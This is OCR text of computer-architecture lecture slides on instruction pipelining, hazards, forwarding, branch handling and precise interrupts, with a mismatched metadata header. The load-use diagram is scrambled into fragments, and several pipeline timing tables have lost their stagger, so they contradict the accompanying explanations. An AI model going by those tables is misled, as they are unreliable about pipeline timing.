{"Source-Url": "https://confluence.slac.stanford.edu/download/temp/pdfexport-20190810-100819-1436-105/PSDM-HitandPeakFindingAlgorithms-100819-1436-106.pdf?contentType=application/pdf", "len_cl100k_base": 8246, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 24594, "total-output-tokens": 8232, "length": "2e13", "weborganizer": {"__label__adult": 0.0004372596740722656, "__label__art_design": 0.001434326171875, "__label__crime_law": 0.0005106925964355469, "__label__education_jobs": 0.0005483627319335938, "__label__entertainment": 0.00015556812286376953, "__label__fashion_beauty": 0.0002498626708984375, "__label__finance_business": 0.00018274784088134768, "__label__food_dining": 0.0005393028259277344, "__label__games": 0.0009765625, "__label__hardware": 0.009307861328125, "__label__health": 0.0006647109985351562, "__label__history": 0.00048065185546875, "__label__home_hobbies": 0.00033354759216308594, "__label__industrial": 0.0016355514526367188, "__label__literature": 0.00022721290588378904, "__label__politics": 0.00035381317138671875, "__label__religion": 0.0008330345153808594, "__label__science_tech": 0.33056640625, "__label__social_life": 0.00012791156768798828, "__label__software": 0.0164337158203125, "__label__software_dev": 0.63232421875, "__label__sports_fitness": 0.0005555152893066406, "__label__transportation": 0.0006284713745117188, "__label__travel": 0.0003159046173095703}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20838, 0.11241]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20838, 0.90582]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20838, 0.76152]], "google_gemma-3-12b-it_contains_pii": [[0, 2820, false], [2820, 4763, null], [4763, 7898, null], [7898, 10343, null], [10343, 10753, null], [10753, 12005, null], [12005, 14323, null], [14323, 16106, null], [16106, 17010, null], [17010, 19333, null], [19333, 20838, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2820, true], [2820, 4763, null], [4763, 7898, null], [7898, 10343, null], [10343, 10753, null], [10753, 12005, null], [12005, 14323, null], [14323, 16106, null], [16106, 17010, null], [17010, 19333, null], [19333, 20838, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20838, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20838, null]], "pdf_page_numbers": [[0, 2820, 1], [2820, 4763, 2], [4763, 7898, 3], [7898, 10343, 4], [10343, 10753, 5], [10753, 12005, 6], [12005, 14323, 7], [14323, 16106, 8], [16106, 17010, 9], [17010, 19333, 10], [19333, 20838, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20838, 0.2339]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
77140701e476ef9092e2c13c26bdccd468137084
|
CPU Performance Equation
- Execution Time = \text{seconds/program}
\[
\frac{\text{instructions}}{\text{program}} \times \frac{\text{cycles}}{\text{instruction}} \times \frac{\text{seconds}}{\text{cycle}}
\]
- Program
- Architecture (ISA)
- Compiler
- Compiler (Scheduling)
- Organization (uArch)
- Microarchitects
- Technology
- Physical Design
- Circuit Designers
Implementation Review
• First, let’s think about how different instructions get executed
Instruction Fetch
- Send the Program Counter (PC) to memory
- Fetch the current instruction from memory
- IR <= Mem[PC]
- Update the PC to the next sequential
- PC <= PC + 4 (4-bytes per instruction)
- Optimizations
- Instruction Caches, Instruction Prefetch
- Performance Affected by
- Code density, Instruction size variability (CISC/RISC)
Abstract Implementation
Instruction Decode/Reg Fetch
• Decide what type of instruction we have
• ALU, Branch, Memory
• Decode Opcode
• Get operands from Reg File
• A <= Regs[IR_{25..21}]; B <= Regs[IR_{20..16}];
• Imm <= SignExtend(IR_{15..0})
• Performance Affected by
• Regularity in instruction format, instruction length
Calculate Effective Address:
- Calculate Memory address for data
- $ALU_{output} \leq A + \text{Imm}$
- \text{LW R10, 10(R3)}
<table>
<thead>
<tr>
<th>Opcode</th>
<th>Rs</th>
<th>Rd</th>
<th>Immediate</th>
</tr>
</thead>
</table>
Calculate Effective Address:
- Calculate target for branch/jump operation
- **BEQZ, BNEZ, J**
- \( ALU_{output} \leq NPC + \text{Imm}; \text{cond} \leq A \text{ op } 0 \)
- “op” is a check against 0, equal, not-equal, etc.
- J is an unconditional
- \( ALU_{output} \leq A \)
Execution: ALU Ops
• Perform the computation
• Register-Register
• $\text{ALU}_{\text{output}} \leq A \text{ op } B$
• Register-Immediate
• $\text{ALU}_{\text{output}} \leq A \text{ op } \text{Imm}$
• No ops need to do effective address calc \textit{and} perform an operation on data
• Why?
Memory Access
- Take effective address, perform Load or Store
- Load
- LMD \( \leq \text{Mem}[\text{ALU}_{\text{output}}] \)
- Store
- \( \text{Mem}[\text{ALU}_{\text{output}}] \leq B \)
Mem Phase on Branches
- Set PC to the calculated effective address
- BEQZ, BNEZ
- If (cond) PC <= ALU_{output} else PC <= NPC
Write-Back
- Send results back to register file
- Register-register ALU instructions
- $\text{Regs}[\text{IR}_{15..11}] <= \text{ALU}_{\text{output}}$
- Register-Immediate ALU instruction
- $\text{Regs}[\text{IR}_{20..16}] <= \text{ALU}_{\text{output}}$
- Load Instruction
- $\text{Regs}[\text{IR}_{20..16}] <= \text{LMD}$
- Why does this have to be a separate step?
What is Pipelining?
• Implementation where multiple instructions are simultaneously overlapped in execution
• Instruction processing has N different stages
• Overlap different instructions working on different stages
• Pipelining is not new
• Ford’s Model-T assembly line
• Laundry – Washer/Dryer
• IBM Stretch [1962]
• Since the ’70s nearly all computers have been pipelined
Pipelining Advantages
- **Unpipelined**
- **Pipelined**

- Latency
- $1/\text{throughput}$
Representation of Pipelines
Program execution order (in instructions)
- lw $10, 20($1)
- sub $11, $2, $3
Time (in clock cycles)
CC 1 CC 2 CC 3 CC 4 CC 5 CC 6
<table>
<thead>
<tr>
<th>lw R10, 20(R1)</th>
<th>IF</th>
<th>ID</th>
<th>EX</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>Sub R11, R2, R3</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
Pipeline Hazards
- **Hazards**
- Situations that prevent the next instruction from executing in its designated clock cycle
- **Structural Hazards**
- When two different instructions want to use the same hardware resource in the same cycle (resource conflict)
- **Data Hazards**
- When an instruction depends on the result of a previous instruction that exposes overlapping of instructions
- **Control Hazards**
- Pipelining of PC-modifying instructions (branch, jump, etc)
How to resolve hazards?
- Simple Solution: Stall the pipeline
- Stops some instructions from executing
- Make them wait for older instructions to complete
- Simple implementation to “freeze” (de-assert write-enable signals on pipeline latches)
- Inserts a “bubble” into the pipe
- Must propagate upstream as well! Why?
### Structural Hazards
- **Two cases when this can occur**
- Resource used more than once in a cycle (Memory, ALU)
- Resource is not fully pipelined (FP Unit)
- **Imagine that our pipeline shares I- and D-memory**
<table>
<thead>
<tr>
<th>Instruction</th>
<th>IF</th>
<th>ID</th>
<th>EX</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>lw R10, 10(R1)</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>sub R11, R2, R3</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
<tr>
<td>add R12, R4, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
<tr>
<td>add R13, R6, R7</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
Structural Hazards
- **Stall**
- Low Cost, Simple (+)
- Increases CPI (-)
- Try to use for rare events in high-performance CPUs
- **Duplicate Resources**
- Decreases CPI (+)
- Increases cost (area), possibly cycle time (-)
- Use for cheap resources, frequent cases
- Separate I-, D-caches, Separate ALU/PC adders, Reg File Ports
Structural Hazards
• Pipeline Resources
• High performance (+)
• Control is simpler than duplication (+)
• Tough to pipeline some things (RAMs) (-)
• Use when frequency makes it worthwhile
• Ex. Fully pipelined FP add/multiplies critical for scientific
• Good news
• Structural hazards don’t occur as long as each instruction uses a resource
– At most once
– Always in the same pipeline stage
– For one cycle
• RISC ISAs are designed with this in mind, reduces structural hazards
Pipeline Stalls
• What could the performance impact of unified instruction/data memory be?
Loads ~15% of instructions, Stores ~10%
Prob (Ifetch + Dfetch) = .25
\[ \text{CPI}_{\text{Real}} = \text{CPI}_{\text{Ideal}} + \text{CPI}_{\text{Stall}} = 1.0 + 0.25 = 1.25 \]
Data Hazards
- Two operands from different instructions use the same storage location
- Must appear as if instructions are executed to completion one at a time
- Three types of Data Hazards
- Read-After-Write (RAW)
- True data-dependence (Most important)
- Write-After-Read (WAR)
- Write-After-Write (WAW)
### RAW Example
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Add R3, R2, R1</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R4, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R6, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R7, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
- First Add writes to R3 in cycle 5
- Second Add reads R3 in cycle 3
- Third Add reads R3 in cycle 4
- We would compute the wrong answer because R3 holds the “old” value
Solutions to RAW Hazards
• As usual, we have a couple of choices
• Stall whenever we have a RAW
• Huge performance penalty, dependencies are common!
• Use Bypass/Forwarding to minimize the problem
• Data is ready by end of EXE (Add) or MEM (Load)
• Basic idea:
– Add comparator for each combination of destination and source registers that can have RAW hazards (How many?)
– Add muxes to datapath to select proper value instead of regfile
• Only stall when absolutely necessary
Solutions to RAW Hazards:
• Two part problem: Detect the RAW, forward/stall the pipe
• Need to keep register ID’s along with pipestages
• Use comparators to check for hazards
• Operand 2 bypass ADD R1, R2, R3
If (R3 == RD(MEM)) use ALUOUT(MEM)
else (if R3 == RD(WB)) use ALUOUT (WB)
else Use R3 from Register File
### Forwarding, Bypassing
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Add R3, R2, R1</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R4, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R6, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R7, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
- **Code is now “stall-free”**
- **Are there any cases where we must stall?**
### Load Use Hazards
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>lw R3, 10(R1)</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R4, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R6, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
- Unfortunately, we can’t forward “backward in time”
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>lw R3, 10(R1)</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R4, R3, R5</td>
<td>IF</td>
<td>ID</td>
<td>stall</td>
<td>EX</td>
<td>MEM</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R6, R3, R5</td>
<td>IF</td>
<td>stall</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
```assembly
WBMEMEXIDIF
Add R6, R3, R5
```
```assembly
7
WB
```
```assembly
WBMEMEXIDIF
Add R4, R3, R5
```
```assembly
6
WB
```
```assembly
WBMEMEXIDIF
lw R3, 10(R1)
```
```assembly
5
MEM
```
```assembly
Memory
```
```assembly
WBMEMEXIDIF
Add R4, R3, R5
```
```assembly
4
EX
```
```assembly
WBMEMEXIDIF
lw R3, 10(R1)
```
```assembly
3
EX
```
```assembly
WBMEMEXIDIF
Add R6, R3, R5
```
```assembly
2
MEM
```
```assembly
WBMEMEXIDIF
lw R3, 10(R1)
```
```assembly
1
WB
```
Load Use Hazards
- Can the compiler help out?
- Scheduling to avoid load followed by immediate use
- “Delayed Loads”
- Define the pipeline slot after a load to be a “delay slot”
- NO interlock hardware. Machine assumes the correct compiler
- Compiler attempts to schedule code to fill delay slots
- Limits to this approach:
- Only can reorder between branches (5-6 instructions)
- Order of loads/stores difficult to swap (alias problems)
- Makes part of implementation architecturally visible
### Instruction Scheduling Example
```plaintext
a = b + c;
d = e – f;
```
How many cycles for each?
<table>
<thead>
<tr>
<th>No Scheduling Version</th>
<th>Scheduled Version</th>
</tr>
</thead>
<tbody>
<tr>
<td>LW Rb, b</td>
<td>LW Rb, b</td>
</tr>
<tr>
<td>LW Rc, c</td>
<td>LW Rc, c</td>
</tr>
<tr>
<td>ADD Ra, Rb, Rc</td>
<td>LW Re, e</td>
</tr>
<tr>
<td>SW a, Ra</td>
<td>ADD Ra, Rb, Rc</td>
</tr>
<tr>
<td>LW Re, e</td>
<td>LW Rf, f</td>
</tr>
<tr>
<td>LW Rf, f</td>
<td>SW a, Ra</td>
</tr>
<tr>
<td>SUB Rd, Re, Rf</td>
<td>SUB Rd, Re, Rf</td>
</tr>
<tr>
<td>SW d, Rd</td>
<td>SW d, Rd</td>
</tr>
</tbody>
</table>
Other Data Hazards: WARs
- **Write-After-Read (WAR) Hazards**
- Can’t happen in our simple 5-stage pipeline because writes always follow reads
- Preview: Late read, early write (auto-increment)
```
i DIV (R1), --, --
i+1 ADD --, R1+, --
```
- Preview: Out-of-Order reads (OOO-execution)
Other Data Hazards: WAWs
- **Write-After-Write (WAW) Hazards**
- Can’t happen in our simple 5-stage pipeline because only one writeback stage (ALU ops go through MEM stage)
- Preview: Slow operation followed by fast operation
i DIVF F0, --, --
i+1 BFPT --, --, --
i+2 ADDF F0, --, --
- Also cache misses (they can return at odd times)
- **What about RARs?**
Control Hazards
- In base pipeline, branch outcome not known until MEM
- Simple solution – stall until outcome is known
- Length of control hazard is branch delay
- In this simple case, it is 3 cycles (assume 10% cond. branches)
- $CPI_{Real} = CPI_{Ideal} + CPI_{Stall} = 1.0 + 3 \text{ cycles} \times .1 = 1.3$
Control Hazards: Solutions Fast Branch Resolution
• Performance penalty could be more than 30%
• Deeper pipelines, some code is very branch heavy
• Fast Branch Resolution
• Adder in ID for PC + immediate targets
• Only works for simple conditions (compare to 0)
• Comparing two register values could be too slow
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Branch Instr.</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +1</td>
<td>stall</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +2</td>
<td>stall</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Control Hazards: Branch Characteristics
- Integer Benchmarks: 14-16% instructions are conditional branches
- FP: 3-12%
- On Average:
- 67% of conditional branches are “taken”
- 60% of forward branches are taken
- 85% of backward branches are taken
- Why?
Control Hazards: Solutions
1. Stall Pipeline
- Simple, No backing up, No Problems with Exceptions
2. Assume not taken
- Speculation requires back-out logic:
- What about exceptions, auto-increment, etc
- Bets the “wrong way”
3. Assume taken
- Doesn’t help in simple pipeline! (don’t know target)
4. Delay Branches
- Can help a bit… we’ll see pro’s and con’s soon
Control Hazards: Assume Not Taken
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Untaken Branch</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +1</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +2</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Looks good if we’re right!
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Taken Branch</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Instr +1</td>
<td>IF</td>
<td>flush</td>
<td>flush</td>
<td>flush</td>
<td>flush</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Branch Target</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Branch Target +1</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Control Hazards: Branch Delay Slots
• Find one instruction that will be executed no matter which way the branch goes
• Now we don’t care which way the branch goes!
• Harder than it sounds to find instructions
• What to put in the slot (80% of the time)
• Instruction from before the branch (indep. of branch)
• Instruction from taken or not-taken path
– Always safe to execute? May need clean-up code (or nullifying branches)
– Helps if you go the right way
• Slots don’t help much with today’s machines
• Interrupts are more difficult (why? We’ll see soon)
Consider the following deeply pipelined organization for a register-memory machine:
<table>
<thead>
<tr>
<th>Stage</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>IF1</td>
<td>Begin Instruction Fetch</td>
</tr>
<tr>
<td>IF2</td>
<td>End Instruction Fetch</td>
</tr>
<tr>
<td>ID</td>
<td>Instruction Decode, Register Read</td>
</tr>
<tr>
<td>ALU1</td>
<td>Address calculation (for branches and memory references); ALU operation for register-register type instructions; branch condition evaluation</td>
</tr>
<tr>
<td>MEM1</td>
<td>Begin memory access for memory instructions; write-back for register-register instructions.</td>
</tr>
<tr>
<td>MEM2</td>
<td>Complete memory access for memory instructions;</td>
</tr>
<tr>
<td>ALU2</td>
<td>Additional ALU cycle for register-memory operations.</td>
</tr>
<tr>
<td>WB</td>
<td>Writeback for register-memory operations; assume register file reads/writes work on split cycles as in the basic DLX pipeline.</td>
</tr>
</tbody>
</table>
Question: To avoid structural hazards, how many ALUs, Reg Read/Write ports are needed?
Pipelining Example
• How many stall cycles between instructions? (do not assume forwarding)
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, R2, R3</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Rx, R1, Ry</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Would forwarding help?
Pipelining Example
- How many stall cycles between instructions? (do not assume forwarding)
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, R2, R3</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Rx, R1, 10(Ry)</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
### Pipelining Example
- How many stall cycles between instructions? (do not assume forwarding)
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, R2, R3</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Rx, Ry, 10(R1)</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Pipelining Example
- How many stall cycles between instructions? (do not assume forwarding)
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>LW R1, 10(Rx)</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Ry, R1, Rz</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
### Pipelining Example
- **How many stall cycles between instructions? (do not assume forwarding)**
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, 10(Rx), Ry</td>
<td>IF1</td>
<td>IF2</td>
<td>ID</td>
<td>ALU1</td>
<td>MEM1</td>
<td>MEM2</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>ADD Rz, 40(R1), Ra</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Now for the hard stuff!
- Precise Interrupts
- What are interrupts?
- Why do they have to be precise?
- Must have well-defined state at interrupt
- All older instructions are complete
- All younger instructions have not started
- All interrupts are taken in program order
Interrupt Taxonomy
- Synchronous vs. Asynchronous (HW error, I/O)
- User Request (exception?) vs. Coerced
- User maskable vs. Nonmaskable (Ignorable)
- Within vs. Between Instructions
- Resume vs. Terminate
The difficult exceptions are resumable interrupts within instructions
- Save the state, correct the cause, restore the state, continue execution
# Interrupt Taxonomy
<table>
<thead>
<tr>
<th>Exception Type</th>
<th>Sync vs. Async</th>
<th>User Request Vs. Coerced</th>
<th>User mask vs. nonmask</th>
<th>Within vs. BetweenInsn</th>
<th>Resume vs. terminate</th>
</tr>
</thead>
<tbody>
<tr>
<td>I/O Device Req.</td>
<td>Async</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Between</td>
<td>Resume</td>
</tr>
<tr>
<td>Invoke O/S</td>
<td>Sync</td>
<td>User</td>
<td>Nonmask</td>
<td>Between</td>
<td>Resume</td>
</tr>
<tr>
<td>Tracing Instructions</td>
<td>Sync</td>
<td>User</td>
<td>Maskable</td>
<td>Between</td>
<td>Resume</td>
</tr>
<tr>
<td>Breakpoint</td>
<td>Sync</td>
<td>User</td>
<td>Maskable</td>
<td>Between</td>
<td>Resume</td>
</tr>
<tr>
<td>Arithmetic Overflow</td>
<td>Sync</td>
<td>Coerced</td>
<td>Maskable</td>
<td>Within</td>
<td>Resume</td>
</tr>
<tr>
<td>Page Fault (not in main m)</td>
<td>Sync</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Within</td>
<td>Resume</td>
</tr>
<tr>
<td>Misaligned Memory</td>
<td>Sync</td>
<td>Coerced</td>
<td>Maskable</td>
<td>Within</td>
<td>Resume</td>
</tr>
<tr>
<td>Mem. Protection Violation</td>
<td>Sync</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Within</td>
<td>Resume</td>
</tr>
<tr>
<td>Using Undefined Insns</td>
<td>Sync</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Within</td>
<td>Terminate</td>
</tr>
<tr>
<td>Hardware/Power Failure</td>
<td>Async</td>
<td>Coerced</td>
<td>Nonmask</td>
<td>Within</td>
<td>Terminate</td>
</tr>
</tbody>
</table>
Interrupts on Instruction Phases
- Exceptions can occur on many different phases
- However, exceptions are only handled in WB
- Why?
<table>
<thead>
<tr>
<th>Exception Type</th>
<th>IF</th>
<th>ID</th>
<th>EXE</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>Arithmetic Overflow</td>
<td></td>
<td></td>
<td>X</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Page Fault (not in main memory)</td>
<td>X</td>
<td></td>
<td></td>
<td>X</td>
<td></td>
</tr>
<tr>
<td>Misligned Memory</td>
<td>X</td>
<td></td>
<td></td>
<td>X</td>
<td></td>
</tr>
<tr>
<td>Mem. Protection Violation</td>
<td>X</td>
<td></td>
<td></td>
<td>X</td>
<td></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Instruction Type</th>
<th>IF</th>
<th>ID</th>
<th>EX</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>load</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>add</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
How to take an exception?
1. Force a trap instruction on the next IF
2. Squash younger instructions (Turn off all writes (register/memory) for faulting instruction and all instructions that follow it)
3. Save all processor state after trap begins
- PC-chain, PSW, Condition Codes, trap condition
- PC-chain is length of the branch delay plus 1
4. Perform the trap/exception code then restart where we left off
Summary of Exceptions
• Precise interrupts are a headache!
• All architected state must be precise
• Delayed branches
• Preview: Out-of-Order completion
• What if something writes-back earlier than the exception?
• Some machines punt on the problem
• Precise exceptions only for integer pipe
• Special “precise mode” used for debugging (10x slower)
Multicycle Operations
• Basic RISC pipeline
• All operations take 1 cycle
• Unfortunately, not the case in real processors
• FP add, Integer/FP Multiply can be 2-6 cycles
• 20-50 cycles for integer/FP divide, square root
• Cache misses can be hundreds of cycles
• Difficulties
• Hard to pipeline
• Differ in number of clock cycles
• Number of operands varies
Multicycle Operations
- For example, longer latency in FP unit
- EX may continue for as long as FP takes to finish
- Assume four separate ALUs
- Integer unit
- FP/Integer Multiplier
- FP Adder
- FP/Integer Divider
- Instruction stalls all instruction behind it if it cannot proceed to EX
Multicycle Terminology
- **Initiation Interval**
- Number of cycles that must elapse between issuing 2 operations of a given type.
- **Latency**
- Number of cycles between an instruction that *produces* a result and an instruction that *uses* the result.
<table>
<thead>
<tr>
<th>Functional Unit</th>
<th>Latency</th>
<th>Initiation Interval</th>
</tr>
</thead>
<tbody>
<tr>
<td>Integer ALU</td>
<td>0</td>
<td>1</td>
</tr>
<tr>
<td>Data Memory</td>
<td>1</td>
<td>1</td>
</tr>
<tr>
<td>FP Add</td>
<td>3</td>
<td>1</td>
</tr>
<tr>
